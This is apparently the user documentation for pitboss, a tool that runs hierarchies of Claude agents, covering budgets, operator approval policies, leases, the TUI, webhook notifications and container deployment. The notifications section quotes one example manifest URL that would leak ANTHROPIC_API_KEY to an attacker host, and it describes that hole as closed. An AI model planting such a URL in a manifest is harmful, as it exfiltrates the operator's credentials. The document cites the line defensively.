The alternative — Sonnet-as-lead with Sonnet-as-worker — costs the same or more, but wastes Sonnet’s reasoning capacity on loop bookkeeping the lead doesn’t need.

When not to use this pattern

Use Sonnet (or higher) for the lead when:

  • The lead makes complex strategic decisions. If the lead needs to interpret cross-worker results and decide whether to change approach mid-run, Haiku’s reasoning limitations become a bottleneck.
  • The lead is synthesizing across many outputs into a unified artifact. Writing a coherent 10-section report that synthesizes 20 worker results is reasoning-heavy work. Use Sonnet.
  • The plan requires backtracking. Multi-step plans where the lead must detect failures and re-plan benefit from Sonnet’s stronger context handling.

Haiku-as-lead works best when the lead’s decision tree is shallow: “for each item, spawn a worker; wait for all; write a summary.” Anything more complex, consider Sonnet.


Sub-leads and cost compounding

With depth-2 sub-leads (v0.6+), costs multiply across tiers:

Root lead (1 session)
├── Sub-lead A (1 session)
│   ├── Worker A1 (1 session)
│   ├── Worker A2 (1 session)
│   └── Worker A3 (1 session)
├── Sub-lead B (1 session)
│   └── ...
└── Sub-lead C (1 session)
    └── ...

A run with 1 root + 3 sub-leads + 4 workers each = 16 sessions. At Haiku-only pricing for all sessions, even 50K token/session average is 800K tokens, which costs ~$0.80–$4 depending on input/output split. At Sonnet pricing the same run is $3–$16.

Sub-lead cost control mechanisms in the manifest:

[run]
budget_usd = 20.00

[[lead]]
id                     = "root"
model                  = "claude-haiku-4-5"
allow_subleads         = true
max_subleads           = 4
max_sublead_budget_usd = 3.00   # hard ceiling per sub-lead
max_workers_across_tree = 12    # bounds peak concurrency (and peak spend rate)

[lead.sublead_defaults]
budget_usd        = 2.00        # default envelope per sub-lead
max_workers       = 3
lead_timeout_secs = 1800

sublead_defaults means you don’t have to specify budget on every spawn_sublead call. max_sublead_budget_usd is a hard ceiling enforced by pitboss — the root lead cannot accidentally grant more even if its prompt instructs it to.

See Depth-2 sub-leads for the full sub-lead envelope model.


Reservation overhead in practice

Understanding the reservation lifecycle helps diagnose “budget exceeded” failures that appear before workers have done any work.

The lifecycle:

  1. spawn_worker is called with estimated_cost_usd = X
  2. Pitboss checks: spent + reserved + X ≤ budget_usd. If not, spawn fails.
  3. If the check passes, X is added to reserved_usd and the worker starts.
  4. On completion, X is released from reserved_usd and actual spend is added to spent_usd.

Common pitfalls:

  • Over-reserving (“to be safe”): Setting estimated_cost_usd high means each worker blocks a large slice of the budget. With 5 workers each estimated at $2 and a $6 budget, only 3 workers can be in-flight at once — the fourth and fifth spawn calls fail until a slot releases. The run serializes instead of parallelizing.
  • Under-reserving: If a worker’s actual spend exceeds its estimate, pitboss reconciles on completion. This won’t crash the worker mid-task, but the spent_usd will exceed budget_usd on reconciliation. Pitboss records the overrun but does not retroactively kill the offending worker.
  • Reservation leak: In rare cases (subprocess crash before reconciliation, pre-Phase-4 race conditions), a reservation stays held after the worker is gone. The reservation releases on pitboss restart. Use pitboss attach to monitor reserved_usd in real time and spot this pattern.

Mitigations:

  • Derive estimates from observed history. Run 3–5 representative tasks manually, measure actual token usage, set estimated_cost_usd at 1.5× the observed mean.
  • Monitor with pitboss attach during the first few runs of a new manifest to validate your estimate calibration.
  • Set budget_usd with 20% headroom over the sum of expected estimates.

See also

Approvals

Pitboss provides two approval primitives that let a lead gate actions on operator review:

  • request_approval — gate a single in-flight action on operator approval.
  • propose_plan — gate the entire run on a pre-flight plan approval.

Both route to the TUI’s approval pane. Without a TUI attached, the [run].approval_policy field controls automatic behavior.

request_approval

The lead calls request_approval when it wants the operator to review a specific action before proceeding. The lead blocks until the operator approves, rejects, or edits.

Args:

{
  "summary": "string",
  "timeout_secs": 60,
  "plan": {
    "summary": "string",
    "rationale": "string",
    "resources": ["path/to/file.rs"],
    "risks": ["May overwrite uncommitted changes"],
    "rollback": "git checkout -- path/to/file.rs"
  }
}

The plan field is optional but strongly recommended for non-trivial actions (deletions, multi-file edits, irreversible operations). The TUI renders the structured fields as labeled sections, with risks highlighted in warning color.

Returns:

{
  "approved": true,
  "comment": "optional operator comment",
  "edited_summary": "optional edited version"
}

propose_plan

The lead calls propose_plan before spawning any workers when a pre-flight review is desired. When [run].require_plan_approval = true, spawn_worker refuses until a propose_plan call has been approved.

The TUI modal shows [PRE-FLIGHT PLAN] in its title (vs [IN-FLIGHT ACTION] for request_approval). On rejection, the gate stays closed — the lead can revise and call propose_plan again.

When require_plan_approval = false (the default), calling propose_plan is still valid but informational only — spawn_worker never checks the result.

[run].approval_policy

Controls handling of approval requests when no TUI is attached:

ValueBehavior
"block" (default)Queue until a TUI connects, or until lead_timeout_secs expires.
"auto_approve"Immediately approve. Useful for CI or unattended runs.
"auto_reject"Immediately reject with comment: "no operator available".

[[approval_policy]] — declarative policy rules (v0.6+)

For finer control, declare deterministic policy rules in the manifest. Rules are evaluated in pure Rust — not LLM-evaluated — before approvals reach the operator queue.

# Auto-approve routine tool-use from sub-lead S1
[[approval_policy]]
match = { actor = "root→S1", category = "tool_use" }
action = "auto_approve"

# Always block plan-category approvals for explicit review
[[approval_policy]]
match = { category = "plan" }
action = "block"

# Block any cost event over $0.50
[[approval_policy]]
match = { category = "cost", cost_over = 0.50 }
action = "block"

Rules are evaluated first-match-wins in declaration order. A request that doesn’t match any rule falls through to the run-level approval_policy.

Match fields

FieldTypeNotes
actorstringActor path, e.g., "root→S1". Unset matches all actors.
categorystring"tool_use", "plan", "cost". Unset matches all categories.
tool_namestringSpecific MCP tool name. Unset matches all.
cost_overfloatFires when cost_estimate > cost_over (USD).

Actions

ActionEffect
"auto_approve"Immediately approve; never reaches the operator queue.
"auto_reject"Immediately reject.
"block"Force operator review regardless of run-level approval_policy.

Approval TTL and fallback (v0.6+)

Each approval request can carry an optional TTL:

  • timeout_secs — the lead can pass a timeout on its request_approval call.
  • fallback — if the approval ages past its TTL without an operator response, the fallback fires (auto_reject, auto_approve, or block). Prevents an unreachable operator from permanently stalling the tree.

TUI approval pane

In the TUI, a non-modal right-rail (30% width) shows pending approvals as a queue. Press 'a' to focus the pane; Up/Down navigate; Enter opens the detail modal.

In the modal:

  • y — approve
  • n — reject (can add an optional reason comment)
  • e — edit (Ctrl+Enter to submit, Esc to cancel)

The reject branch accepts an optional reason string that flows back through MCP to the requesting actor’s session, allowing Claude to adapt without a separate reprompt_worker round-trip.

Reject-with-reason

When an approval is rejected with a reason, the reason is included in the MCP response returned to the lead. This allows the lead to adapt its behavior immediately (e.g., switch output format, try a different approach) without requiring a separate reprompt_worker call.

Using approvals as a security control

[[approval_policy]] can be used to gate state-changing tool invocations before they execute, independent of operator availability. See Security → Defense-in-depth → Approval-gated state-changing tools for a manifest pattern that auto-approves reads and blocks writes for operator review.

Approval policy reference

Overview

The [[approval_policy]] TOML block defines deterministic approval rules that auto-resolve requests before they reach the operator. Rules are pure Rust evaluation, NOT LLM-evaluated.

Each rule matches against fixed approval fields (actor path, category, tool name, cost estimate) and applies an action (auto_approve, auto_reject, or block). Rules are evaluated in declaration order; the first match wins. If no rule matches, the approval falls through to the run-level [run].approval_policy (or the operator queue if no default is set).

Why it exists: At depth-2 scale where N concurrent sub-leads can spawn M approval requests each, the operator queue drowns in noise. Policy rules handle routine approvals deterministically, surfacing only exceptional cases.


TOML syntax

[[approval_policy]]
match = { actor = "root→S1", category = "tool_use", tool_name = "Bash", cost_over = 0.50 }
action = "auto_approve"

[[approval_policy]]
match = { category = "plan" }
action = "block"
  • [[approval_policy]] — each rule is a separate array-of-tables block.
  • match — TOML inline table of conditions. All fields are optional; an empty match = {} matches every approval (catch-all). Multiple match fields use AND semantics.
  • action — one of "auto_approve", "auto_reject", or "block".

Match fields reference

FieldTypeMatches whenNotes
actorstring (optional)The approval’s actor_path rendered as a string (e.g., "root" or "root→S1") equals the valueUse "root" for root-level requests. Use "root→<sublead_id>" for a specific sub-lead; sub-lead IDs are UUIDv7 and runtime-generated, so this field is most useful when you know the sub-lead’s identity in advance — e.g., from a prior spawn_sublead response. Exact string match only; no wildcard patterns.
categoryenum (optional)The approval’s category field equals the value exactlyAllowed values: "tool_use", "plan", "cost", "other". Most request_approval calls land in tool_use; propose_plan lands in plan. Cost-category approvals are not emitted by default (see deferment notes).
tool_namestring (optional)The lead’s optional tool_name hint on request_approval equals the valueOnly fires if the lead populates the optional tool_name arg. Without it, this field never matches. Exact string match only.
cost_overfloat (optional)The lead’s optional cost_estimate hint exceeds this threshold (strict > comparison)Only fires if the lead passes a cost_estimate arg to request_approval. Without it, this field never matches. Numeric greater-than comparison.

Action values

ActionEffect
"auto_approve"Approval is resolved as approved without operator interaction. The requesting actor’s MCP call returns approved=true immediately. Logged at info level for audit trail.
"auto_reject"Approval is resolved as rejected without operator interaction. The requesting actor receives approved=false. The response includes reason text "auto-rejected by policy".
"block"Forces the approval to enqueue for operator action regardless of its match. Overrides any run-level [run].approval_policy default that would be permissive. Useful for “always require explicit approval for X” rules.

Evaluation order and semantics

  • Rules are evaluated in declaration order from top to bottom in the manifest.
  • The first rule whose match clause fully matches (all specified fields match) wins. Its action is applied immediately.
  • If no rule matches any approval field, the approval falls through to the run-level [run].approval_policy value.
  • If no run-level policy is set and no rule matches, the approval is queued for the operator (the default v0.5 behavior).
  • block action does NOT short-circuit further rule evaluation for other approvals. It only guarantees the current approval reaches the operator queue.

Worked examples

Pattern A: Auto-approve routine reads, surface mutations

[[approval_policy]]
match = { tool_name = "Read" }
action = "auto_approve"

[[approval_policy]]
match = { tool_name = "Glob" }
action = "auto_approve"

[[approval_policy]]
match = { tool_name = "Grep" }
action = "auto_approve"

# Everything else (Bash, Write, Edit, etc.) falls through to operator

How it works: Leads must populate tool_name on their request_approval calls for this to work. File reads are auto-approved, reducing noise. Any other tool (including Write, Edit, Bash, or custom MCP tools) reaches the operator.

Note: Requires the lead’s prompt to pass tool_name on every request_approval call. Without it, these rules won’t fire.


Pattern B: Block all plan approvals, auto-approve trusted sub-lead’s tool use

[[approval_policy]]
match = { category = "plan" }
action = "block"

[[approval_policy]]
match = { actor = "root→sublead-trusted-id", category = "tool_use" }
action = "auto_approve"

How it works: Order matters. The category = "plan" rule fires first, blocking all propose_plan calls for explicit operator review. The second rule auto-approves tool-use from a specific trusted sub-lead (once you know its UUIDv7). Tool-use from other actors falls through to the operator.

When to use: Multi-phase runs where you want to gate each phase’s plan proposal (to catch logic errors early) but trust a specific sub-lead’s tool invocations.


Pattern C: Cost-bounded auto-approval

[[approval_policy]]
match = { category = "cost", cost_over = 1.00 }
action = "block"

[[approval_policy]]
match = { category = "cost" }
action = "auto_approve"

How it works: Cost-category approvals over $1.00 always reach the operator. Smaller ones auto-approve. This is a firewall against unexpectedly expensive operations.

Note: This pattern is forward-looking. As of v0.6, leads do not emit cost-category approvals by default. The lead must explicitly call request_approval with category = "cost" for these rules to fire. See deferment notes below.


Deferment notes

The following features are not in v0.6 but are requested or planned:

Runtime policy mutation

TUI commands to add/remove rules mid-run are deferred to v0.7+. v0.6 reads the policy once at manifest load. You cannot change rules while a run is in flight.

No regex or glob patterns in match values

Match fields support exact string comparison only. Wildcard patterns like tool_name = "Read*" or actor = "root→sublead-*" are not supported. Matching is literal. If you have a use case that needs wildcard matching (e.g., “auto-approve all Read variants”), please file an issue.

Cost-category approvals are not emitted by default

The request_approval MCP tool defaults to category = "tool_use". For cost-category rules to fire in practice, the lead must explicitly pass category = "cost" when calling request_approval. Most leads don’t do this yet, so cost-category rules have limited utility in v0.6.

Rule-index attribution in logs

Auto-action logs say “auto-approved by policy” or “auto-rejected by policy” but do not (currently) name which rule fired. Adding rule indices to audit logs is a small followup that would help track which policy pattern is in effect.


See also

Leases & coordination

Pitboss provides a hierarchical coordination surface for workers and leads:

  • Per-layer KV store — an in-memory key-value store per dispatch layer (root, each sub-lead). Four namespaces with different access rules.
  • Per-layer leases/leases/* namespace within each layer’s KV store.
  • Run-global leasesrun_lease_acquire / run_lease_release for cross-tree coordination (v0.6+).

The KV namespaces

All KV tools operate on paths within the current layer’s store.

NamespaceWho can writeWho can readUse for
/ref/*Lead onlyAll actors in this layerShared configuration, task lists, conventions the lead wants all workers to see
/peer/<actor-id>/*That actor only (and lead as override)That actor + the layer’s leadPer-worker outputs (findings, status flags, partial results)
/peer/self/*Any actorAlias: the dispatcher resolves /peer/self/ to /peer/<caller.actor_id>/ at the tool layer
/shared/*All actorsAll actorsLoose cross-worker coordination (shared findings, counters)
/leases/*Managed via lease_acquire / lease_releaseMutual exclusion within this layer

KV tools

ToolPurpose
kv_getRead a single entry by path
kv_setWrite a value; bumps version on each write
kv_casCompare-and-swap: write only if the current version matches expected_version
kv_listList entries matching a glob pattern
kv_waitBlock until a path reaches a minimum version (long-poll)
lease_acquireAcquire a named lease with a TTL; blocks or fails if held
lease_releaseRelease a held lease

See Coordination & state for full signatures and return shapes.

Lease acquisition

lease_acquire(name: string, ttl_secs: u32, wait_secs?: u32)
→ { lease_id, version, acquired_at, expires_at }
  • name — the lease key (a path under /leases/*).
  • ttl_secs — how long the lease lives after acquisition. The lease auto-expires if the holder crashes.
  • wait_secs — optional: block up to this many seconds for the lease to become available. Default: fail immediately if already held.

Leases are auto-released when the holding actor’s MCP session terminates (connection drop, worker crash, etc.).

Per-layer vs run-global leases

Use /leases/* (per-layer) for resources internal to the current sub-tree:

  • A worker-coordinated counter for “next chunk to process within this sub-tree”
  • A mutex for a shared file within one phase’s working directory
  • Any resource only one sub-tree ever writes to

Use run_lease_acquire (run-global) for resources that span sub-trees:

  • A path on the operator’s filesystem that any sub-tree might write to
  • A shared service or port that multiple sub-leads compete for
  • Any resource that must be serialized across the entire dispatch tree
run_lease_acquire(key: string, ttl_secs: u32) → { lease_id, version }
run_lease_release(lease_id: string) → { ok: true }

The run-global registry is on DispatchState — outside any layer — so it spans all sub-trees.

When in doubt: prefer run_lease_acquire. Over-serializing is safer than silent cross-tree collision.

Shared store dump

Set dump_shared_store = true in [run] to write <run-dir>/shared-store.json at finalize time. Useful for post-mortem inspection of cross-worker coordination state.

[run]
dump_shared_store = true

Using leases as a security control

Run-global leases can serialize access to sensitive shared resources — deploy pipelines, credential stores, shared output paths — preventing concurrent writes from multiple agents. See Security → Defense-in-depth → Run-global lease as serialization gate for a manifest pattern and commentary on what this does and does not protect.

Architecture note

The KV store is in-memory and per-run. It is not persisted between runs (except via the optional shared-store.json dump). Workers in separate runs cannot see each other’s state.

See Lease scope selection for a deeper discussion of the architectural rationale.

TUI

pitboss-tui is the live floor view: a tile grid of all workers in the current run, with live log tailing, budget and token counters, and a full control plane for cancellation, pause, reprompt, and approval management.

Opening the TUI

pitboss-tui                # open the most recent run
pitboss-tui 019d99         # open a run by UUID prefix
pitboss-tui list           # print a table of runs to stdout

The TUI polls the run directory at 250ms intervals. It can open a run while dispatch is in progress (most useful) or after the fact for post-mortem review.

Grid view

The main view is a tile grid. Each tile represents one actor (lead, sub-lead, or worker). Tiles show:

  • Actor role and ID (with for leads, for workers)
  • Current state: Running, Done, Failed, Paused, Frozen, Cancelled, etc.
  • Model family color swatch (opus = magenta, sonnet = blue, haiku = green)
  • Partial token count and cost estimate
  • KV/lease activity counters when non-zero (kv:N lease:M)

In depth-2 runs, sub-trees render as collapsible containers with a header showing the sub-lead ID, budget bar, worker count, and approval badge.

Detail view

Press Enter on a tile to open the Detail view. It’s a split pane:

  • Left — identity, lifecycle, token totals + cost, activity counters (tool calls / results / top tools), and a one-shot git diff --shortstat summary.
  • Right — scrollable log with semantic color coding (assistant text = white, tool use = cyan, tool results = green, rate limits = yellow, result events = magenta, system = gray).

Scroll the log:

KeysScroll
j / k / arrows1 row
J / K5 rows
Ctrl-D / Ctrl-U / PageDown / PageUp10 rows
g / GJump to top / bottom (G re-enables auto-follow)
Scroll wheel5 rows/tick
KeyAction
h j k l / arrowsNavigate tiles in grid view
EnterOpen Detail view for focused tile
oRun picker (switch to another run)
?Help overlay (full keybinding reference)
q / Ctrl-CQuit
EscClose any overlay or modal
TabCycle focus across sub-tree containers (depth-2 runs)

Control plane keybindings

KeyAction
xCancel focused worker (with confirm modal)
XCancel entire run (cascades to all workers)
pPause focused worker (requires initialized session)
cContinue paused worker
rOpen reprompt textarea (Ctrl+Enter to submit, Esc to cancel)

Approval pane

Press 'a' to focus the approval list pane (right-rail, 30% width). Pending approvals queue here as they arrive.

KeyAction
Up / DownNavigate the approval queue
EnterOpen detail modal for selected approval

In the approval modal:

KeyAction
yApprove
nReject (optionally add a reason comment)
eEdit the summary (Ctrl+Enter to submit, Esc to cancel)

Mouse support

ActionEffect
Left-click tileFocus + open Detail
Left-click run in pickerOpen that run
Right-click inside DetailExit back to grid
Scroll wheel inside DetailScroll log 5 rows/tick

pitboss attach — single-worker follow mode

For a terminal-only follow view on one worker without the full TUI:

pitboss attach <run-id> <task-id>
pitboss attach <run-id> <task-id> --raw       # stream raw stream-JSON jsonl
pitboss attach <run-id> <task-id> --lines 200 # larger backfill

Run-id is resolved by prefix (first 8 chars are enough when unique). Exits on Ctrl-C or when the worker emits its terminal result.

Notifications

Pitboss can push notifications to external sinks when key run events occur. This is useful for monitoring long-running dispatches from outside the TUI — for example, getting a Slack message when a budget-intensive run finishes.

Configuration

Add a [[notification]] section to your manifest for each sink:

[[notification]]
kind = "slack"
url = "${PITBOSS_SLACK_WEBHOOK_URL}"   # env-var substitution supported (prefix required, see below)
events = ["run_finished", "budget_exceeded"]
severity_min = "info"

[[notification]]
kind = "discord"
url = "${PITBOSS_DISCORD_WEBHOOK_URL}"
events = ["approval_request", "approval_pending", "run_finished"]

[[notification]]
kind = "webhook"
url = "https://my-server.example.com/pitboss-events"
events = ["approval_request", "budget_exceeded", "run_finished"]

The top-level field is kind, not type. TOML parses it literally — a type = "slack" line will be rejected with an unknown field error at validate time.

Supported sinks

Sinkkind valueNotes
Generic HTTP POST"webhook"Sends a JSON payload with the event
Slack Incoming Webhook"slack"Formats as a Slack message block
Discord Webhook"discord"Formats as a Discord embed with severity-coded color, markdown-escaped fields, and allowed_mentions: []
Log only"log"Writes to stderr via tracing; useful for debugging + CI contexts where the operator watches logs

Events

EventSeverityWhen it fires
approval_requestWarningAn approval is enqueued for operator action (v0.6+)
approval_pendingWarningAn approval enqueues and awaits operator action with no TUI attached (v0.6+) — distinct from approval_request for alerting when a run is blocked
run_finishedInfoThe dispatch completes (all tasks settled or cancelled)
budget_exceededCriticalA spawn_worker or spawn_sublead fails due to budget exhaustion

Severity filtering

The optional severity_min field filters by the event’s declared severity (not a per-sink override — each event has a fixed severity). Ordering is info < warning < error < critical. Default is "info" (emit everything).

For example, severity_min = "warning" on a Discord sink skips run_finished (Info) but delivers approval_request (Warning) and budget_exceeded (Critical).

Delivery semantics

  • Notifications fire asynchronously via tokio::spawn — they don’t block the dispatch.
  • Failed deliveries are retried up to 3 times with exponential backoff (100ms → 300ms → 900ms).
  • An LRU dedup cache (size 64) prevents retry storms for the same event. Dedup key is {run_id}:{event_kind}[:{discriminator}] (discriminator is request_id for approval events, "first" for budget exceeded).
  • Delivery failures are logged via tracing::error! with the sink id and dedup key. The dispatcher continues regardless — notification failures never fail a run.
  • Per-attempt HTTP timeout: 30 seconds.

Env-var substitution

URLs support ${PITBOSS_VAR_NAME} substitution from the process environment. This keeps webhook URLs (which are themselves secrets — anyone with the URL can post to the channel) out of manifest files that might be committed to git:

[[notification]]
kind = "slack"
url = "${PITBOSS_SLACK_WEBHOOK_URL}"
events = ["run_finished"]

As of v0.7.1, only env vars whose names start with PITBOSS_ may be substituted. This closes an exfiltration vector where a rogue manifest could write url = "https://attacker/?t=${ANTHROPIC_API_KEY}" and leak any host env var to a chosen webhook. Unprefixed names fail loudly at validate time rather than silently reaching through to std::env::var.

If you were using an unprefixed var name in older manifests, rename it in your shell init (or deployment config):

# Before
export SLACK_WEBHOOK_URL="https://hooks.slack.com/..."

# After (v0.7.1+)
export PITBOSS_SLACK_WEBHOOK_URL="https://hooks.slack.com/..."

Webhook URL validation (v0.7.1+)

Beyond the env-var prefix, all webhook / slack / discord URLs are validated at manifest load:

  • Scheme must be https://. http://, file://, and other non-https schemes are rejected.
  • Host must not resolve to a loopback, private, link-local, unspecified, broadcast, CGNAT (100.64.0.0/10), IPv6 ULA (fc00::/7), or IPv6 link-local (fe80::/10) address. IPv4-mapped IPv6 (::ffff:127.0.0.1) is also rejected.
  • Hostnames like localhost and *.localhost are blocked by name.

If you need to post to an internal service for development, the workaround is to route through a public relay (e.g. an ngrok tunnel) — pitboss will not speak directly to a private address.

Discord sink: markdown and mention safety (v0.7.1+)

The Discord sink escapes markdown and mention characters (* _ ~ \ | > # [ ] ( ) @ < :) in untrusted fields (request_id, task_id, summary, run_id, source) before embedding them in the Discord description. Each payload also sets allowed_mentions: { parse: [] } so Discord doesn’t resolve @everyone / @here / user / role / channel mentions even if one sneaks past the escaping.

Slack sink parallel hardening is a known roadmap item — until it lands, avoid routing untrusted content (task summaries from external sources) through Slack.

For the canonical notification schema reference, see AGENTS.md in the source tree.

Running Pitboss with docker-compose

Compose files for the common deployment shapes. All examples work with podman compose or docker compose unchanged — the files below use plain Compose v2 syntax with no Docker-specific extensions.

If you haven’t yet: pull the image once.

podman pull ghcr.io/sds-mode/pitboss:latest

Shared prerequisites

  • Host auth: claude login has been run on the host at least once, so ~/.claude/.credentials.json exists. This file gets bind-mounted into every example.

  • Host claude binary: until the pitboss-with-claude variant ships (v0.7+ — see Using Claude in a container once PR2 lands), operators using the bare pitboss image also mount their host’s claude binary. Find it with:

    which claude
    # typical: /usr/local/bin/claude  (npm global)
    #          ~/.claude/local/claude-bundle/claude  (Anthropic installer)
    

    The examples assume /usr/local/bin/claude. Adjust if yours differs.

  • SELinux hosts (Fedora/RHEL/Rocky) need :z on bind mounts — the examples include it. It’s a no-op on Ubuntu/Debian.

  • UID alignment: set UID/GID env vars before running compose so the container process matches your host user and mounted files stay writable:

    export UID=$(id -u)
    export GID=$(id -g)
    

Example 1 — One-shot headless dispatch

Fires off a dispatch and exits. Good for CI, cron jobs, “run this manifest against this repo and email me when done” scripts.

Project layout:

my-project/
├── docker-compose.yml
├── manifest.toml
├── repo/              # your target git repo
└── runs/              # created on first run; pitboss writes here

docker-compose.yml:

services:
  pitboss:
    image: ghcr.io/sds-mode/pitboss:latest
    user: "${UID:-1000}:${GID:-1000}"
    working_dir: /workspace
    command: pitboss dispatch /run/pitboss.toml
    volumes:
      # Host auth (OAuth tokens). Read-write: claude rotates tokens.
      - ${HOME}/.claude:/home/pitboss/.claude:rw,z

      # Host claude binary. Remove once pitboss-with-claude ships.
      - /usr/local/bin/claude:/usr/local/bin/claude:ro

      # Manifest + target repo + run-output dir.
      - ./manifest.toml:/run/pitboss.toml:ro
      - ./repo:/workspace:rw,z
      - ./runs:/home/pitboss/.local/share/pitboss:rw,z

Run it:

podman compose up            # stream logs, exit when done
podman compose up --abort-on-container-exit  # if using docker compose

Inspect the run afterward:

ls runs/                     # one directory per run-id
cat runs/<run-id>/summary.json | jq

Example 2 — Long-running dispatch + TUI attached

Use when you want the TUI’s live floor view while a hierarchical run is in flight. Two services share the run-state directory; the TUI runs attached to a TTY.

docker-compose.yml:

x-pitboss-env: &pitboss-env
  user: "${UID:-1000}:${GID:-1000}"
  working_dir: /workspace

services:
  dispatch:
    <<: *pitboss-env
    image: ghcr.io/sds-mode/pitboss:latest
    command: pitboss dispatch /run/pitboss.toml
    volumes:
      - ${HOME}/.claude:/home/pitboss/.claude:rw,z
      - /usr/local/bin/claude:/usr/local/bin/claude:ro
      - ./manifest.toml:/run/pitboss.toml:ro
      - ./repo:/workspace:rw,z
      - pitboss-runs:/home/pitboss/.local/share/pitboss

  tui:
    <<: *pitboss-env
    image: ghcr.io/sds-mode/pitboss:latest
    command: pitboss-tui
    tty: true
    stdin_open: true
    depends_on:
      - dispatch
    volumes:
      - pitboss-runs:/home/pitboss/.local/share/pitboss:rw

volumes:
  pitboss-runs:

Run with:

podman compose up -d dispatch       # start dispatch in background
podman compose run --rm tui         # attach TUI to a TTY

The TUI process exits when you q. Dispatch keeps running in the background. podman compose down when the dispatch finishes (or before to cancel).

Shared volume note: pitboss-runs is a named volume rather than a host bind mount so both services see the same state dir without SELinux label juggling. If you want the runs on the host filesystem, swap it for ./runs:/home/pitboss/.local/share/pitboss:rw,z in both services.

Example 3 — Headless dispatch with webhook notifications

Same as Example 1, but the manifest is wired to fire a Slack webhook when an approval is pending or the run finishes. Useful for long-running batch work where you want the run to continue autonomously but still get poked when it ends or needs you.

manifest.toml:

[run]
max_workers = 6
budget_usd = 2.00
lead_timeout_secs = 3600
approval_policy = "block"

[[notification]]
kind = "slack"
url = "${PITBOSS_SLACK_WEBHOOK_URL}"
events = ["approval_pending", "run_finished"]
severity_min = "info"

[[lead]]
id = "main"
directory = "/workspace"
prompt = "..."

docker-compose.yml:

services:
  pitboss:
    image: ghcr.io/sds-mode/pitboss:latest
    user: "${UID:-1000}:${GID:-1000}"
    working_dir: /workspace
    command: pitboss dispatch /run/pitboss.toml
    environment:
      # Notification webhook env vars must be `PITBOSS_`-prefixed — pitboss
      # only substitutes `${VAR}` tokens into notification URLs when the
      # name starts with `PITBOSS_`, so host secrets can't be exfiltrated
      # by a rogue manifest.
      PITBOSS_SLACK_WEBHOOK_URL: ${PITBOSS_SLACK_WEBHOOK_URL}
    volumes:
      - ${HOME}/.claude:/home/pitboss/.claude:rw,z
      - /usr/local/bin/claude:/usr/local/bin/claude:ro
      - ./manifest.toml:/run/pitboss.toml:ro
      - ./repo:/workspace:rw,z
      - ./runs:/home/pitboss/.local/share/pitboss:rw,z

Run with the webhook URL in the shell environment:

export PITBOSS_SLACK_WEBHOOK_URL="https://hooks.slack.com/services/..."
podman compose up

The ${VAR} substitution in manifest.toml is done by pitboss itself at dispatch-time, so the env var flows: shell → compose environment: → container env → pitboss → manifest. Only names starting with PITBOSS_ are substituted; ${ANTHROPIC_API_KEY} or ${AWS_SECRET} in a webhook URL would be refused at load time. Webhook URLs must also be https:// and must not resolve to a loopback, private, link-local, or CGNAT address.

Example 4 — pitboss-with-claude variant (v0.7+)

Once the bundled variant ships (PR2 of the 2-PR sequence adding ghcr.io/sds-mode/pitboss-with-claude), drop the host-claude bind mount and switch the image name:

services:
  pitboss:
    image: ghcr.io/sds-mode/pitboss-with-claude:latest
    user: "${UID:-1000}:${GID:-1000}"
    working_dir: /workspace
    command: pitboss dispatch /run/pitboss.toml
    volumes:
      - ${HOME}/.claude:/home/pitboss/.claude:rw,z
      # No host-claude mount needed — claude is bundled at a pinned version.
      - ./manifest.toml:/run/pitboss.toml:ro
      - ./repo:/workspace:rw,z
      - ./runs:/home/pitboss/.local/share/pitboss:rw,z

Troubleshooting

“claude: command not found” inside the container. The host-binary mount path doesn’t match where your claude is installed. Run which claude on the host and update the /usr/local/bin/claude line in the compose file.

“Permission denied” reading .credentials.json. UID mismatch between the container process and the mounted file. Make sure UID and GID are exported in your shell before podman compose up.

Worker worktrees fail with “repository is dirty”. The bind mount at /workspace points at a repo with uncommitted changes, and use_worktree = true (the default) wants a clean tree. Either commit first, or set use_worktree = false in [defaults] for read-only analysis runs.

SELinux AVC denials in the host audit log. Add ,z to the bind mount flags (./repo:/workspace:rw,z). The z label tells SELinux this mount is shared across containers/host, applying a compatible context.

Rootless podman + :z label. Rootless podman can’t write SELinux labels on directories it doesn’t own. Workaround: chcon -Rt container_file_t ./runs ./repo once as a privileged user, or use named volumes (Example 2’s pattern).

See also

Using Claude in a container

Pitboss ships two container images:

ImageWhat’s insideWhen to use
ghcr.io/sds-mode/pitbossPitboss binaries onlyYou want to mount or install claude yourself, or you’re layering pitboss into an existing base image.
ghcr.io/sds-mode/pitboss-with-claudePitboss + pinned Claude Code CLIYou want a self-contained image you can pull and run.

Both images are multi-arch (linux/amd64 + linux/arm64) and follow the same tag scheme (:latest, semver tags, :main).

The bundled image pins a specific Claude Code version. To check it at runtime:

podman inspect ghcr.io/sds-mode/pitboss-with-claude:latest \
  --format '{{index .Config.Labels "ai.anthropic.claude-code.version"}}'

Linux host: mount ~/.claude

Claude Code on Linux stores OAuth tokens at ~/.claude/.credentials.json. The bundled container reads credentials from /home/pitboss/.claude (via CLAUDE_CONFIG_DIR), so bind-mounting your host’s ~/.claude Just Works:

# One-time on the host:
claude login

# Every pitboss run:
podman run --rm --userns=keep-id \
  -v "$HOME/.claude:/home/pitboss/.claude:rw,z" \
  -v "$PWD/manifest.toml:/run/pitboss.toml:ro,z" \
  ghcr.io/sds-mode/pitboss-with-claude:latest \
  pitboss dispatch /run/pitboss.toml

Why --userns=keep-id?

Rootless podman runs the container in a user namespace. Without --userns=keep-id, your host UID 1000 maps to in-container UID 0 (fake root), and the bundled pitboss user (container UID 1000) maps to a different host subuid — the mounted credentials look root-owned to the in-container pitboss user and become unreadable. --userns=keep-id aligns the mapping so host UID 1000 maps directly to container UID 1000.

If you’re running Docker instead of rootless podman, skip the flag: Docker doesn’t use user namespaces by default, so mounted files’ UIDs pass through unchanged. Use -u "$(id -u):$(id -g)" there if your host UID isn’t 1000.

Why the :z flag?

On SELinux-enforcing distros (Fedora, RHEL, CentOS, Rocky), a bind mount without a label is unreadable from the container. The :z flag tells podman/docker to apply a shared SELinux label so the container can read the mount. Ubuntu and Debian operators can omit it.

Important: ALL bind mounts need :z, not just ~/.claude. Missing :z on the manifest mount is a common footgun — it produces a cryptic Permission denied (os error 13) from pitboss at manifest-read time.

macOS host: Keychain can’t be mounted

On macOS, claude stores OAuth tokens in the system Keychain — not in ~/.claude/. The Keychain isn’t mountable into a container. Two fallbacks:

Option A: API key

If you have a standalone Anthropic API key (pay-as-you-go, separate from a Claude subscription):

docker run --rm \
  -e ANTHROPIC_API_KEY="$ANTHROPIC_API_KEY" \
  -v "$PWD/manifest.toml:/run/pitboss.toml:ro" \
  ghcr.io/sds-mode/pitboss-with-claude:latest \
  pitboss dispatch /run/pitboss.toml

